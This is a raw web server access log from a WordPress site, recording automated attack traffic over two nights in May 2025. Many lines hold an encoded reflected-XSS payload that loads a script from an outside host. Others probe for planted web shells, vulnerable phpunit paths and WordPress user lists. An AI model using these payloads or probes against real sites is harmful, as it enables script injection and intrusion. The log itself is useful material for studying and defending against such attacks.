94.102.49.19 - - [02/May/2025:22:59:34 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:22:59:37 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
144.91.119.115 - - [02/May/2025:23:00:37 +0330] "GET /wp-content/plugins/HelloDollyV2/hello_dolly_v2.php HTTP/1.1" 301 20 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
144.91.119.115 - - [02/May/2025:23:01:24 +0330] "GET /wp-content/themes/include.php HTTP/1.1" 301 20 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
94.102.49.19 - - [02/May/2025:22:49:13 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6633 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
3.16.186.108 - - [02/May/2025:22:54:56 +0330] "GET / HTTP/1.1" 301 20 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
94.102.49.19 - - [02/May/2025:23:08:05 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6633 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [02/May/2025:23:08:07 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
3.16.186.108 - - [02/May/2025:23:32:37 +0330] "GET /wp-content/plugins/essential-addons-for-elementor-lite/readme.txt HTTP/1.1" 200 14097 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
3.16.186.108 - - [02/May/2025:23:32:44 +0330] "GET / HTTP/1.1" 301 20 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
3.16.186.108 - - [02/May/2025:23:33:33 +0330] "GET /wp-json/wp/v2/users HTTP/1.1" 301 20 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
3.16.186.108 - - [02/May/2025:23:33:49 +0330] "GET / HTTP/1.1" 301 20 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
3.16.186.108 - - [02/May/2025:23:34:00 +0330] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 71 "http://optimyar.freecloudservices.ir/wp-admin/admin-ajax.php" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
3.16.186.108 - - [02/May/2025:23:33:04 +0330] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 71 "http://optimyar.freecloudservices.ir/wp-admin/admin-ajax.php" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
5.250.71.142 - - [02/May/2025:23:51:05 +0330] "GET / HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Linux; Android 13; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.111 Mobile Safari/537.36"
49.7.227.204 - - [03/May/2025:00:06:32 +0330] "GET / HTTP/1.1" 301 20 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
94.102.49.19 - - [03/May/2025:00:12:34 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6633 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:00:12:35 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
120.76.193.63 - - [03/May/2025:00:20:16 +0330] "GET / HTTP/1.0" 301 0 "http://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
143.110.190.60 - - [03/May/2025:00:13:09 +0330] "GET / HTTP/1.0" 301 0 "http://optimyar.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
94.102.49.19 - - [03/May/2025:00:17:51 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:00:17:51 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:00:36:00 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:00:40:10 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:00:43:22 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:00:43:27 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:00:50:25 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6634 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:00:58:48 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
92.205.212.113 - - [03/May/2025:01:01:35 +0330] "GET /wp-login.php HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
152.53.225.138 - - [03/May/2025:00:53:55 +0330] "GET /style.php HTTP/1.1" 403 6635 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
94.102.49.19 - - [03/May/2025:00:59:10 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:00:59:12 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
3.16.186.108 - - [03/May/2025:01:13:52 +0330] "GET /wp-content/plugins/essential-addons-for-elementor-lite/readme.txt HTTP/1.1" 200 14097 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
94.102.49.19 - - [03/May/2025:01:13:53 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
3.16.186.108 - - [03/May/2025:01:15:58 +0330] "GET / HTTP/1.1" 301 20 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
3.16.186.108 - - [03/May/2025:01:16:06 +0330] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 71 "http://optimyar.com/wp-admin/admin-ajax.php" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
95.217.43.182 - - [03/May/2025:01:02:51 +0330] "GET /wp-content/plugins/forminator/readme.txt HTTP/1.1" 301 20 "-" "python-requests/2.32.3"
3.16.186.108 - - [03/May/2025:01:14:46 +0330] "GET / HTTP/1.1" 301 20 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
3.16.186.108 - - [03/May/2025:01:14:53 +0330] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 71 "http://optimyar.com/wp-admin/admin-ajax.php" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
3.16.186.108 - - [03/May/2025:01:15:33 +0330] "GET /wp-json/wp/v2/users HTTP/1.1" 301 20 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
94.102.49.19 - - [03/May/2025:01:33:16 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
92.205.215.142 - - [03/May/2025:01:42:27 +0330] "GET /wp-login.php HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
31.214.174.196 - - [03/May/2025:01:44:27 +0330] "GET /.well-known/pki-validation/about.php HTTP/1.1" 404 796 "-" "get_local:DCV"
31.214.174.196 - - [03/May/2025:01:44:42 +0330] "GET /.well-known/pki-validation/xmrlpc.php HTTP/1.1" 404 796 "-" "get_local:DCV"
31.214.174.196 - - [03/May/2025:01:44:47 +0330] "GET /.well-known/pki-validation/sx.php HTTP/1.1" 404 796 "-" "get_local:DCV"
95.217.43.182 - - [03/May/2025:01:40:23 +0330] "GET /wp-content/plugins/forminator/readme.txt HTTP/1.1" 301 20 "-" "python-requests/2.32.3"
31.214.174.196 - - [03/May/2025:01:43:32 +0330] "GET /.well-known/pki-validation/ HTTP/1.1" 404 796 "-" "get_local:DCV"
31.214.174.196 - - [03/May/2025:01:43:44 +0330] "GET /.well-known/pki-validation/wp-admin/ HTTP/1.1" 404 796 "-" "get_local:DCV"
31.214.174.196 - - [03/May/2025:01:43:51 +0330] "GET /.well-known/pki-validation/file.php HTTP/1.1" 404 796 "-" "get_local:DCV"
31.214.174.196 - - [03/May/2025:01:43:51 +0330] "GET /.well-known/pki-validation/top.php HTTP/1.1" 404 796 "-" "get_local:DCV"
47.129.150.33 - - [03/May/2025:01:44:10 +0330] "GET /wp-login.php HTTP/1.1" 301 20 "-" "Mozilla/5.0"
31.214.174.196 - - [03/May/2025:01:44:30 +0330] "GET /.well-known/pki-validation/cloud.php HTTP/1.1" 404 796 "-" "get_local:DCV"
94.102.49.19 - - [03/May/2025:02:09:53 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
156.242.39.101 - - [03/May/2025:02:24:48 +0330] "GET /vendor/phpunit/phpunit/LICENSE HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
156.228.113.45 - - [03/May/2025:02:26:56 +0330] "GET /vendor/phpunit/phpunit/LICENSE HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
156.228.113.45 - - [03/May/2025:02:27:08 +0330] "GET /wp-login.php HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
156.228.113.45 - - [03/May/2025:02:27:03 +0330] "GET /vendor/phpunit/phpunit/src/Util/PHP/ HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
94.102.49.19 - - [03/May/2025:02:40:44 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:02:49:13 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6636 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
136.243.228.198 - - [03/May/2025:03:01:30 +0330] "GET / HTTP/1.1" 301 20 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
94.102.49.19 - - [03/May/2025:03:04:11 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:03:04:12 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
222.79.104.23 - - [03/May/2025:03:11:32 +0330] "GET / HTTP/1.1" 301 20 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
154.213.164.87 - - [03/May/2025:03:15:25 +0330] "GET /vendor/phpunit/phpunit/LICENSE HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
94.102.49.19 - - [03/May/2025:03:12:33 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6633 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:03:12:34 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6633 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:03:16:14 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6636 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:03:21:17 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:03:33:08 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6633 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:03:33:09 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6633 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
94.102.49.19 - - [03/May/2025:03:26:06 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6635 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
156.228.102.246 - - [03/May/2025:03:26:52 +0330] "GET /vendor/phpunit/phpunit/LICENSE HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
3.16.186.108 - - [03/May/2025:03:35:51 +0330] "GET /wp-content/plugins/essential-addons-for-elementor-lite/readme.txt HTTP/1.1" 200 14097 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
3.16.186.108 - - [03/May/2025:03:40:14 +0330] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 71 "http://optimyar.freecloudservices.ir/wp-admin/admin-ajax.php" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
104.168.138.73 - - [03/May/2025:03:42:50 +0330] "GET / HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 OPR/89.0.4447.51"
104.168.138.73 - - [03/May/2025:03:43:17 +0330] "GET /sevices/ HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 OPR/89.0.4447.51"
3.16.186.108 - - [03/May/2025:03:45:55 +0330] "GET / HTTP/1.1" 301 20 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
3.16.186.108 - - [03/May/2025:03:49:02 +0330] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 71 "http://optimyar.freecloudservices.ir/wp-admin/admin-ajax.php" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
3.16.186.108 - - [03/May/2025:03:36:59 +0330] "GET / HTTP/1.1" 301 20 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
94.102.49.19 - - [03/May/2025:03:40:25 +0330] "GET /?p=2&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6633 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
3.16.186.108 - - [03/May/2025:03:44:38 +0330] "GET /wp-json/wp/v2/users HTTP/1.1" 301 20 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
154.213.166.97 - - [03/May/2025:04:07:27 +0330] "GET /vendor/phpunit/phpunit/LICENSE HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
154.213.166.97 - - [03/May/2025:04:07:40 +0330] "GET /wp-login.php HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
94.102.49.19 - - [03/May/2025:04:13:18 +0330] "GET /?p=1&utm_id=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fmedia.cdnstaticjs.com%3E%3C%2Fscript%3E HTTP/1.1" 403 6633 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0"
43.130.106.18 - - [03/May/2025:04:16:15 +0330] "GET / HTTP/1.1" 301 20 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
154.213.166.97 - - [03/May/2025:04:07:34 +0330] "GET /vendor/phpunit/phpunit/src/Util/PHP/ HTTP/1.1" 301 20 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
196.251.80.216 - - [03/May/2025:04:38:20 +0330] "GET / HTTP/1.1" 403 17004 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.216 - - [03/May/2025:04:38:21 +0330] "GET /plugins/content/apismtp/apismtp.php?test=hello HTTP/1.1" 403 17004 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.216 - - [03/May/2025:04:38:22 +0330] "GET /plugins/content/apismtp/apismtp.php.suspected?test=hello HTTP/1.1" 403 17004 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.216 - - [03/May/2025:04:38:20 +0330] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 403 17004 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.216 - - [03/May/2025:04:38:20 +0330] "POST /ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 403 17004 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.216 - - [03/May/2025:04:38:20 +0330] "POST /alfacgiapi/perl.alfa HTTP/1.1" 403 17004 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.216 - - [03/May/2025:04:38:21 +0330] "GET /wp-content/plugins/apikey/apikey.php?test=hello HTTP/1.1" 403 17004 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.216 - - [03/May/2025:04:38:21 +0330] "GET /wp-content/plugins/apikey/apikey.php.suspected?test=hello HTTP/1.1" 403 17004 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.216 - - [03/May/2025:04:38:20 +0330] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
31.214.174.196 - - [03/May/2025:04:38:24 +0330] "POST /wp-cron.php?doing_wp_cron=1746234504.6574909687042236328125 HTTP/1.1" 200 20 "-" "WordPress/6.8.1; https://optimyar.com"
196.251.80.216 - - [03/May/2025:04:38:20 +0330] "POST /wp-plain.php HTTP/1.1" 404 101821 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
